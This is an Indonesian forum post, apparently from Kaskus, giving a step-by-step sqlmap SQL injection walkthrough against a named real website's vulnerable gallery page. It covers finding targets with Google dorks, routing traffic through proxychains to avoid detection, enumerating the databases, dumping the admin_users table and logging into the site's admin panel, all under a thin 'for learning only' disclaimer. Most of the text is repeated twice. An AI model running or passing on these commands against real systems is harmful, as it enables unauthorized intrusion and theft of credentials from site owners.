- Beranda
- Komunitas
- Tech
- Linux dan OS Selain Microsoft & Mac
SQLmap Web Database Pentesting
TS
nyem2nyem
SQLmap Web Database Pentesting
Sahabat kaskuser, tentu kalian tidak asing lagi dengan tool yang satu ini, terutama pecinta pentesting, banyak sekali defacer menggunakan trik ini untuk mengatahui database suatu web sakaligus passwordnya, tapi tidak ada salahnya kita mencoba..
namun sebelumnya saya sampaikan, tolong ilmu ini hanya sekedar pembelajaran saja sucuil ilmu tentang pentesting security, mohon jangan disalah gunakan..
Untuk menghindari tindakan kriminal, saya dalam menulis artikel ini hanya sebatas menyampaikan hasil dari vuln dan deface dari hacker luar negeri, jadi murni bukan dari saya pribadi, karena maksud saya menulis artikel ini hanya sebatas menyampaikan dan menularkan ilmu kepada teman-teman semuanya...
jadi mohon jangan disalah gunakan, ok ^_^
sebelumnya siapkan dulu alat tempurnya, yaitu sqlmap..
bagi kalian pengguna distro pentesting seperti backtrack dan blackbuntu tentu tidak usah repot-repot install aplikasi ini karena sudah default terinstall di kedua distro tersebut, namun pentesting dapat dilakukan di distro manapun, karena kemampuan anda menggambarkan reputasi anda, bukan berbagai tools yang anda miliki, toh tools yang anda pakai adalah buatan orang lain, apalagi berbasis GUI,, gak banget deh
eace
bagi pengguna ubuntu seperti saya install dulu aplikasinya, jangan lupa tambahkan repo backtrack, caranya dapat dilihat disini
[CENTER]Update dan Upgrade Java MacBuntu rasa BackTrack.[/CENTER]
ilahkan install sqlmapnya, jangan lupa jalan di root
root@arum:/home/sandy# apt-get install sqlmap
klo sudah install akan nampak seperti ini
setelah aplikasi sqlmap terinstall sekarang kita cari target, tentunya yang mempunya vuln, teknik mencari vuln web dapat dilakukan dengan kreatifitas google dork
dan ini google Dorknya
dan saya tegaskan saya tidak berniat jahat untuk merusak, untuk anda lebih percaya bahwa tujuan saya adalah "baik-baik" maka saya akan memilih target yang pernah dijamah hacker luar, sepertinya hacker dari turki, untuk meyakinkan silahkan kunjungi alamat berikut http://www.hanhdance.com/
lihat laman utamanya, sudah pernah di deface orang lain kan?
tips selanjutnya, agar lebih aman dalam melakukan pentesting sebagai anda menggunakan jalur proxy, sukur-sukur ssh tunneling,
kalian dapat menggunakan tools proxychains, untuk konfigurasinya dapat kalian lihat di Thread ane
dan vuln websitenya adalah : http://www.hanhdance.com/gallery.php?id=47
itu target kita gan, buka aplikasi sqlmap atau bisa melalui terminal, jangan lupa status root
root@arum:/home/sandy# cd /pentest/database/sqlmap/
root@arum:/pentest/database/sqlmap#
root@arum:/pentest/database/sqlmap# proxychains python sqlmap.py -u www.webtarget.com--dbs
maka:
root@arum:/pentest/database/sqlmap# proxychains python sqlmap.py -u http://www.hanhdance.com/gallery.php?id=47 --dbs
dan nampak list databasenya
available databases [3]:
[*] hanhdanceeditor
[*] information_schema
[*] test
root@arum:/pentest/database/sqlmap# proxychains python sqlmap.py -u http://www.webtarget.com -D nama_database --tables
root@arum:/pentest/database/sqlmap# proxychains python sqlmap.py -u http://www.hanhdance.com/gallery.php?id=47 -D hanhdanceeditor --tables
dan nampak list tables dari database hanhdanceeditor
root@arum:/pentest/database/sqlmap# proxychains python sqlmap.py -u http://www.webtarget.com-D nama_database -T nama_tables --columns
root@arum:/pentest/database/sqlmap# proxychains python sqlmap.py -u http://www.hanhdance.com/gallery.php?id=47 -D hanhdanceeditor -T admin_users --columns
maka akan terlihat list columns
Database: hanhdanceeditor
Table: admin_users
sekarang finalisasi eksekusi deh pass dan user dengan dump
root@arum:/pentest/database/sqlmap#proxychains python sqlmap.py -u www.webtarget.com-D nama_database -T nama_tables --dump
root@arum:/pentest/database/sqlmap#proxychains python sqlmap.py -u http://www.hanhdance.com/gallery.php?id=47 -D hanhdanceeditor -T admin_users --dump
taraaaa, password dan usernya sudah terlihat
sekarang buka laman berikut dan masukan user dan passwordnya
http://www.hanhdance.com/admin/
silahkan dicoba, tapi ingat jangan disalahgunakan ea? ^_^
jangan lupa mampir di blog ane gan
namun sebelumnya saya sampaikan, tolong ilmu ini hanya sekedar pembelajaran saja sucuil ilmu tentang pentesting security, mohon jangan disalah gunakan..
Untuk menghindari tindakan kriminal, saya dalam menulis artikel ini hanya sebatas menyampaikan hasil dari vuln dan deface dari hacker luar negeri, jadi murni bukan dari saya pribadi, karena maksud saya menulis artikel ini hanya sebatas menyampaikan dan menularkan ilmu kepada teman-teman semuanya...
jadi mohon jangan disalah gunakan, ok ^_^
sebelumnya siapkan dulu alat tempurnya, yaitu sqlmap..
bagi kalian pengguna distro pentesting seperti backtrack dan blackbuntu tentu tidak usah repot-repot install aplikasi ini karena sudah default terinstall di kedua distro tersebut, namun pentesting dapat dilakukan di distro manapun, karena kemampuan anda menggambarkan reputasi anda, bukan berbagai tools yang anda miliki, toh tools yang anda pakai adalah buatan orang lain, apalagi berbasis GUI,, gak banget deh
eacebagi pengguna ubuntu seperti saya install dulu aplikasinya, jangan lupa tambahkan repo backtrack, caranya dapat dilihat disini
[CENTER]Update dan Upgrade Java MacBuntu rasa BackTrack.[/CENTER]
ilahkan install sqlmapnya, jangan lupa jalan di root
root@arum:/home/sandy# apt-get install sqlmap
klo sudah install akan nampak seperti ini
Spoiler for :
setelah aplikasi sqlmap terinstall sekarang kita cari target, tentunya yang mempunya vuln, teknik mencari vuln web dapat dilakukan dengan kreatifitas google dork
dan ini google Dorknya
Spoiler for List Dork:
dan saya tegaskan saya tidak berniat jahat untuk merusak, untuk anda lebih percaya bahwa tujuan saya adalah "baik-baik" maka saya akan memilih target yang pernah dijamah hacker luar, sepertinya hacker dari turki, untuk meyakinkan silahkan kunjungi alamat berikut http://www.hanhdance.com/
lihat laman utamanya, sudah pernah di deface orang lain kan?
tips selanjutnya, agar lebih aman dalam melakukan pentesting sebagai anda menggunakan jalur proxy, sukur-sukur ssh tunneling,
kalian dapat menggunakan tools proxychains, untuk konfigurasinya dapat kalian lihat di Thread ane
dan vuln websitenya adalah : http://www.hanhdance.com/gallery.php?id=47
itu target kita gan, buka aplikasi sqlmap atau bisa melalui terminal, jangan lupa status root
root@arum:/home/sandy# cd /pentest/database/sqlmap/
root@arum:/pentest/database/sqlmap#
root@arum:/pentest/database/sqlmap# proxychains python sqlmap.py -u www.webtarget.com--dbs
maka:
root@arum:/pentest/database/sqlmap# proxychains python sqlmap.py -u http://www.hanhdance.com/gallery.php?id=47 --dbs
dan nampak list databasenya
available databases [3]:
[*] hanhdanceeditor
[*] information_schema
[*] test
root@arum:/pentest/database/sqlmap# proxychains python sqlmap.py -u http://www.webtarget.com -D nama_database --tables
root@arum:/pentest/database/sqlmap# proxychains python sqlmap.py -u http://www.hanhdance.com/gallery.php?id=47 -D hanhdanceeditor --tables
dan nampak list tables dari database hanhdanceeditor
Spoiler for :
root@arum:/pentest/database/sqlmap# proxychains python sqlmap.py -u http://www.webtarget.com-D nama_database -T nama_tables --columns
root@arum:/pentest/database/sqlmap# proxychains python sqlmap.py -u http://www.hanhdance.com/gallery.php?id=47 -D hanhdanceeditor -T admin_users --columns
maka akan terlihat list columns
Database: hanhdanceeditor
Table: admin_users
Spoiler for :
sekarang finalisasi eksekusi deh pass dan user dengan dump
root@arum:/pentest/database/sqlmap#proxychains python sqlmap.py -u www.webtarget.com-D nama_database -T nama_tables --dump
root@arum:/pentest/database/sqlmap#proxychains python sqlmap.py -u http://www.hanhdance.com/gallery.php?id=47 -D hanhdanceeditor -T admin_users --dump
taraaaa, password dan usernya sudah terlihat
Spoiler for :
sekarang buka laman berikut dan masukan user dan passwordnya
http://www.hanhdance.com/admin/
Spoiler for :
Spoiler for :
silahkan dicoba, tapi ingat jangan disalahgunakan ea? ^_^
jangan lupa mampir di blog ane gan
Diubah oleh nyem2nyem 30-06-2013 20:29
tata604 memberi reputasi
1
22.2K
12
Thread Digembok
Urutan
Terbaru
Terlama
Thread Digembok
Komunitas Pilihan